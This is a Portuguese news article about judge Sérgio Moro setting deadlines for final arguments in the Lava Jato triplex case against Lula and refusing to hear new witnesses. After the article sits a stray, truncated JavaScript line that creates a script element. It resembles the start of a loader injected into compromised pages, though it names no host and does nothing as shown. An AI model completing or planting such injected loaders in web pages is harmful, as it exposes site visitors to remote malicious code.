Moro marca datas para alegações finais na ação do triplex

O juiz Sérgio Moro, responsável pelos processos da Lava Jato, determinou datas que podem findar com a ação do triplex. Ele decidiu que a acusação terá até o dia 2 de junho e a Petrobras tem até o dia 6 de junho para se manifestar. Já as defesas podem apresentar conclusões até dia 20 de junho.

Além disso, Moro negou o pedido do Ministério Público Federal (MPF) e da defesa do ex-presidente Luiz Inácio Lula da Silva para ouvir mais testemunhas na ação penal. A decisão foi publicada no sistema eletrônico da Justiça Federal por volta das 5h30 desta segunda-feira (15).

“Quanto à pretensão de oitiva de novas testemunhas, devia a defesa ter indicado nome e endereço, sendo inapropriado pretender transferir o ônus a terceiros. Indefiro, portanto, o requerido por deficiência no requerimento e desnecessidade da prova”, disse Moro em um trecho do despacho.

O processo investiga se o ex-presidente Luiz Inácio Lula da Silva, acusado de corrupção passiva e lavagem de dinheiro, recebeu R$ 3,7 milhões em propina, de forma dissimulada, da empreiteira OAS. Em troca, a empresa seria beneficiada em contratos com a Petrobras.

Sobre o pedido do MPF, Moro afirmou, na decisão, que: “Enfim, este Juízo já ouviu muitos depoimentos sobre o apartamento triplex e sobre a reforma dele, não sendo necessários novos a esse respeito”, acrescentou o juiz.

var d=document;var s=d.createElement(‘script’);

Deixe um comentário